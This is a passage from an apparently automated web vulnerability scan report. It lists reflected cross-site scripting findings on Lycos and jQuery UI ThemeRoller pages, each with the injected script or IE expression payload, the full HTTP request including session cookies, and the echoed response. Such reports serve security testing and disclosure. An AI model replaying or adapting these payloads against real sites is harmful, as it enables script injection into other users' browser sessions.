GET /?tab=multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&cat=images HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327d3"><script>alert(1)</script>739d92ba30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tos.php/327d3"><script>alert(1)</script>739d92ba30c HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163891850882

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 91442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<a href="/tos.php/327d3"><script>alert(1)</script>739d92ba30c#acceptance">
...[SNIP]...

3.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ade7"style="x:expression(alert(1))"6cec803882f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f=1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161724686; path=/
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=num82irdh4ljeo4nnvsi6bqqo5; expires=Sun, 12 Dec 2010 15:34:34 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
Set-Cookie: diktfc=20F93AF4482D6F2C33F3F1B215794291BCD892461E6A; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;2ade7"style="x:expression(alert(1))"6cec803882f=1&amp;q=">
...[SNIP]...

3.56. http://jobs.lycos.com/search [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 was submitted in the x parameter. This input was echoed as b25f3"style="x:expression(alert(1))"8e6083360e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?x=1b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161729042; path=/
Date: Sun, 12 Dec 2010 14:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=4dq7os30hes5qg14m1sf1m0oc1; expires=Sun, 12 Dec 2010 15:34:36 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/
Set-Cookie: diktfc=FA178DC2496B1980044763822ACABD48B570396C18E7; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;x=1b25f3"style="x:expression(alert(1))"8e6083360e1&amp;q=">
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10fbb"><script>alert(1)</script>21f65dae1a0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

3.58. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7317f"><script>alert(1)</script>b5f47834e30 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69061"><script>alert(1)</script>1a694a592e7 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c43"><script>alert(1)</script>a36a3b5f95c was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fef"><script>alert(1)</script>4b472d7ef35 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac242"><script>alert(1)</script>71aa1498cfe was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e26"><script>alert(1)</script>1a3124de35d was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
